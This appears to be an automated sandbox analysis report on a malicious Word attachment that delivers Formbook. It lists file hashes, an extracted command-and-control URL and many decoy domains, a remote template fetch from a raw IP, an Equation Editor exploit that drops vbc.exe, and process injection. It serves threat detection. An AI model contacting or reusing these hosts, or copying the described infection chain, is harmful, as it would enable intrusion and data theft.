Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
25-05-2021 11:47
Static task
static1
Behavioral task
behavioral1
Sample
Quote 2405987021.docx
Resource
win7v20210410
Behavioral task
behavioral2
Sample
Quote 2405987021.docx
Resource
win10v20210408
General
-
Target
Quote 2405987021.docx
-
Size
10KB
-
MD5
992acd038fd49f200bd5510c029e74b1
-
SHA1
f1a0abb5f96c21f8a799e4f65c4216bd968c29b7
-
SHA256
5274c7fea16b84e327d5af683b6ef0c3e1fe1649b6cea88399e029ed5deeee6f
-
SHA512
e08e069138e70fc13ce97ccd1f5b99c763d5b23f90773f8248a4ca5b6e3dc3e71ef277f1dd365c71e58b960b221f0ff5479694baf10a66ca6079431ff84eef10
Malware Config
Extracted
formbook
4.1
http://www.mpaiji.com/c244/
ssgasija.com
procyoon.com
mood-street-food.com
yeglifeview.com
baoyai.com
sundarsheni.com
notoli.photography
sweetape.com
ergas.group
asyrill.com
jin188v.com
stlazarushospitalnola.com
dohertyfamily5.com
duniaclubs.club
ngobryles.com
scottsavocasalon.com
unifiui.com
baileyfred.com
nabiagency.com
alyssaternanphotography.com
whitehome-re.com
nitaraine.com
rklogtransportes.com
closetcouturenc.com
day.gallery
suxfi.com
mittikasaman.com
livesupgrade.com
hasbiadam.com
masdelafont-mauguio.com
topadofa.com
humanimmunogenomics.com
exit-blog.com
andersonsignandbannerco.com
ellasween.com
jmycjj.com
dhshk.com
peaceful-dolphin.com
flossydesigns.com
mrevivalkids.com
paintmehappywithcassandra.com
daishuaku.com
c2spot.com
odiaproduct.com
skillfultopshop.com
mentorbp.com
annualchecklist.com
jasaborongan.com
fasttrainheal.com
flatfootedhatting.com
brionreilly.com
ogcaterers.info
uuhlashwe.club
subsidy-kennwort.info
logisticmoversusa.com
houseofkabbalah.com
ahealingjournee.com
diemtinthitruong.com
naturallybossed.com
turksandcaicosdirect.com
hudsonvalleyfinearts.net
brocousa.com
getyourcostsdown.com
liveitupmusic.com
Signatures
-
Formbook Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1796-71-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral1/memory/1796-72-0x000000000041EB20-mapping.dmp formbook behavioral1/memory/112-83-0x0000000000070000-0x000000000009E000-memory.dmp formbook -
Blocklisted process makes network request 1 IoCs
Processes:
EQNEDT32.EXEflow pid process 8 1660 EQNEDT32.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
vbc.exevbc.exepid process 1964 vbc.exe 1796 vbc.exe -
Abuses OpenXML format to download file from external location 2 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key opened \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Office\Common\Offline\Files\http://198.46.132.185/..-.-.-......................................................-...-/..................................................wbk WINWORD.EXE -
Loads dropped DLL 2 IoCs
Processes:
EQNEDT32.EXEpid process 1660 EQNEDT32.EXE 1660 EQNEDT32.EXE -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 3 IoCs
Processes:
vbc.exevbc.exewscript.exedescription pid process target process PID 1964 set thread context of 1796 1964 vbc.exe vbc.exe PID 1796 set thread context of 1272 1796 vbc.exe Explorer.EXE PID 112 set thread context of 1272 112 wscript.exe Explorer.EXE -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2020 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 29 IoCs
Processes:
vbc.exewscript.exepid process 1796 vbc.exe 1796 vbc.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe 112 wscript.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1272 Explorer.EXE -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
vbc.exewscript.exepid process 1796 vbc.exe 1796 vbc.exe 1796 vbc.exe 112 wscript.exe 112 wscript.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
vbc.exeExplorer.EXEwscript.exeWINWORD.EXEdescription pid process Token: SeDebugPrivilege 1796 vbc.exe Token: SeShutdownPrivilege 1272 Explorer.EXE Token: SeShutdownPrivilege 1272 Explorer.EXE Token: SeDebugPrivilege 112 wscript.exe Token: SeShutdownPrivilege 1272 Explorer.EXE Token: SeShutdownPrivilege 2020 WINWORD.EXE Token: SeShutdownPrivilege 1272 Explorer.EXE -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXEpid process 1272 Explorer.EXE 1272 Explorer.EXE 1272 Explorer.EXE 1272 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1272 Explorer.EXE 1272 Explorer.EXE 1272 Explorer.EXE 1272 Explorer.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXEvbc.exepid process 2020 WINWORD.EXE 2020 WINWORD.EXE 1964 vbc.exe -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
EQNEDT32.EXEvbc.exeWINWORD.EXEExplorer.EXEwscript.exedescription pid process target process PID 1660 wrote to memory of 1964 1660 EQNEDT32.EXE vbc.exe PID 1660 wrote to memory of 1964 1660 EQNEDT32.EXE vbc.exe PID 1660 wrote to memory of 1964 1660 EQNEDT32.EXE vbc.exe PID 1660 wrote to memory of 1964 1660 EQNEDT32.EXE vbc.exe PID 1964 wrote to memory of 1796 1964 vbc.exe vbc.exe PID 1964 wrote to memory of 1796 1964 vbc.exe vbc.exe PID 1964 wrote to memory of 1796 1964 vbc.exe vbc.exe PID 1964 wrote to memory of 1796 1964 vbc.exe vbc.exe PID 1964 wrote to memory of 1796 1964 vbc.exe vbc.exe PID 1964 wrote to memory of 1796 1964 vbc.exe vbc.exe PID 1964 wrote to memory of 1796 1964 vbc.exe vbc.exe PID 2020 wrote to memory of 1784 2020 WINWORD.EXE splwow64.exe PID 2020 wrote to memory of 1784 2020 WINWORD.EXE splwow64.exe PID 2020 wrote to memory of 1784 2020 WINWORD.EXE splwow64.exe PID 2020 wrote to memory of 1784 2020 WINWORD.EXE splwow64.exe PID 1272 wrote to memory of 112 1272 Explorer.EXE wscript.exe PID 1272 wrote to memory of 112 1272 Explorer.EXE wscript.exe PID 1272 wrote to memory of 112 1272 Explorer.EXE wscript.exe PID 1272 wrote to memory of 112 1272 Explorer.EXE wscript.exe PID 112 wrote to memory of 1668 112 wscript.exe cmd.exe PID 112 wrote to memory of 1668 112 wscript.exe cmd.exe PID 112 wrote to memory of 1668 112 wscript.exe cmd.exe PID 112 wrote to memory of 1668 112 wscript.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Quote 2405987021.docx"2⤵
- Abuses OpenXML format to download file from external location
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122883⤵
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\SysWOW64\wscript.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Public\vbc.exe"3⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\vbc.exeMD5
9c0ab971e60116467107fe8dd787e5cf
SHA108aefe2b9ab89d7522a93e8a6e442ee3ceb85eee
SHA256ef4cb9aea5d837610a28160c179ef3c4f381f84a8cbdd3464563800c53a95f15
SHA5120d18dd253bd46ec632da4388545fb8b2cfa958488c34a7416f674969a06c023828dc299046438981d54985bf0d8e9d675abb38e3f2905b48e73e4f0d6e131c63
-
C:\Users\Public\vbc.exeMD5
9c0ab971e60116467107fe8dd787e5cf
SHA108aefe2b9ab89d7522a93e8a6e442ee3ceb85eee
SHA256ef4cb9aea5d837610a28160c179ef3c4f381f84a8cbdd3464563800c53a95f15
SHA5120d18dd253bd46ec632da4388545fb8b2cfa958488c34a7416f674969a06c023828dc299046438981d54985bf0d8e9d675abb38e3f2905b48e73e4f0d6e131c63
-
C:\Users\Public\vbc.exeMD5
9c0ab971e60116467107fe8dd787e5cf
SHA108aefe2b9ab89d7522a93e8a6e442ee3ceb85eee
SHA256ef4cb9aea5d837610a28160c179ef3c4f381f84a8cbdd3464563800c53a95f15
SHA5120d18dd253bd46ec632da4388545fb8b2cfa958488c34a7416f674969a06c023828dc299046438981d54985bf0d8e9d675abb38e3f2905b48e73e4f0d6e131c63
-
\Users\Public\vbc.exeMD5
9c0ab971e60116467107fe8dd787e5cf
SHA108aefe2b9ab89d7522a93e8a6e442ee3ceb85eee
SHA256ef4cb9aea5d837610a28160c179ef3c4f381f84a8cbdd3464563800c53a95f15
SHA5120d18dd253bd46ec632da4388545fb8b2cfa958488c34a7416f674969a06c023828dc299046438981d54985bf0d8e9d675abb38e3f2905b48e73e4f0d6e131c63
-
\Users\Public\vbc.exeMD5
9c0ab971e60116467107fe8dd787e5cf
SHA108aefe2b9ab89d7522a93e8a6e442ee3ceb85eee
SHA256ef4cb9aea5d837610a28160c179ef3c4f381f84a8cbdd3464563800c53a95f15
SHA5120d18dd253bd46ec632da4388545fb8b2cfa958488c34a7416f674969a06c023828dc299046438981d54985bf0d8e9d675abb38e3f2905b48e73e4f0d6e131c63
-
memory/112-83-0x0000000000070000-0x000000000009E000-memory.dmpFilesize
184KB
-
memory/112-84-0x0000000001F60000-0x0000000002263000-memory.dmpFilesize
3.0MB
-
memory/112-85-0x0000000001E30000-0x0000000001EC3000-memory.dmpFilesize
588KB
-
memory/112-82-0x00000000002D0000-0x00000000002F6000-memory.dmpFilesize
152KB
-
memory/112-80-0x0000000000000000-mapping.dmp
-
memory/1272-79-0x0000000004A10000-0x0000000004B93000-memory.dmpFilesize
1.5MB
-
memory/1272-86-0x00000000062E0000-0x00000000063DC000-memory.dmpFilesize
1008KB
-
memory/1660-63-0x0000000076281000-0x0000000076283000-memory.dmpFilesize
8KB
-
memory/1668-81-0x0000000000000000-mapping.dmp
-
memory/1784-76-0x000007FEFC141000-0x000007FEFC143000-memory.dmpFilesize
8KB
-
memory/1784-74-0x0000000000000000-mapping.dmp
-
memory/1796-77-0x0000000000700000-0x0000000000A03000-memory.dmpFilesize
3.0MB
-
memory/1796-78-0x0000000000250000-0x0000000000264000-memory.dmpFilesize
80KB
-
memory/1796-72-0x000000000041EB20-mapping.dmp
-
memory/1796-71-0x0000000000400000-0x000000000042E000-memory.dmpFilesize
184KB
-
memory/1964-66-0x0000000000000000-mapping.dmp
-
memory/2020-60-0x0000000072C41000-0x0000000072C44000-memory.dmpFilesize
12KB
-
memory/2020-62-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2020-61-0x00000000706C1000-0x00000000706C3000-memory.dmpFilesize
8KB
-
memory/2020-87-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB